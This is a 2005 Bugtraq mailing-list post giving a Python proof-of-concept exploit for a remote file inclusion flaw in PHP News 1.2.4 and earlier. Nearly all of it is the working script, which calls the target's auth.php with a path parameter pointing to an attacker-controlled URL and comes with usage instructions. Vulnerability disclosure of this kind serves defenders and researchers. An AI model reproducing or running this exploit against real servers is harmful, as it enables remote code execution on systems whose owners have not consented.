PHP News <= 1.2.4 - Remote File Inclusion Exploit

From: mozako (mozako_at_mybox.it)
Date: 03/04/05

  • Next message: Sebastian Wolfgarten: "Re: TYPO3 SQL Injection vunerabilitie"
    Date: Thu, 03 Mar 2005 23:24:31 +0000
    To: bugtraq@securityfocus.com
    
    

    [badroot security POC]: PHP News <= 1.2.4 - Remote File Inclusion Exploit

    =- Description -=

    A simple POC exploit for PHP News <= 1.2.4 remote file inclusion
    vulnerability discovered by Filip Groszynski.

    =- Exploit -=

    #!/usr/bin/python
    # PHP News 1.2.4 remote file inclusion exploit
    # Coded by: mozako - mozako [at] mybox [dot] it
    # Vuln. Discovered by: Filip Groszynski
    # 3.3.2005
    #
    # (C) 2005 badroot security

    import urllib2
    import sys
    __argv__ = sys.argv
    def usage():
        print "PHP News 1.2.4 remote file inclusion exploit \nby:
    mozako\n3.3.2005\n\nUsage:\n$ ./phpN.py -h http://123.4.5.6 -p
    /PHP_News_Path/ -u http://filetoupload"
        sys.exit(-1)
    if len(__argv__) < 2:
        usage()
    try:
        global host
        global path
        global url
        host = __argv__[2]
        path = __argv__[4]
        url = __argv__[6]
    except IndexError:
            usage()
    def hack():
        try:
            print "[X] Connecting...",
            urllib2.urlopen(host + path + "auth.php?path=" + url)
            print "[OK]"
            print "[X] Sending exploit...", "[OK]"
            print "[X] File sended !"
        except urllib2.HTTPError:
            print "[Failed]"
        except urllib2.httplib.InvalidURL:
            print "[Bad host]\nis there http:// ? :)"
        except ValueError:
            print "[Bad host]\nis there http:// ? :)"
    hack()
    # eof

    -- 
    http://www.fatalimpulse.net
    

  • Next message: Sebastian Wolfgarten: "Re: TYPO3 SQL Injection vunerabilitie"